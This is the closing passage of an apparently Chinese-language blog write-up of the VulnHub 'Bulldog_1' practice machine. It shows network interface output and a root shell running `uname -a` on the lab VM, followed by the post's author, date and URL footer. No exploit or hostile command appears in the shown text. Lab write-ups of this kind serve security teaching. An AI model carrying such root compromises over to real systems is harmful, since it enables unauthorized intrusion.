    inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe07:ae20/64 scope link 
       valid_lft forever preferred_lft forever
root@bulldog:/home/django/bulldog# uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
knowledge_database > vulnhub
Bulldog_1 靶机
https://i3eg1nner.github.io/2023/07/57098f1aa06f.html
作者
I3eg1nner
发布于
2023年7月3日
许可协议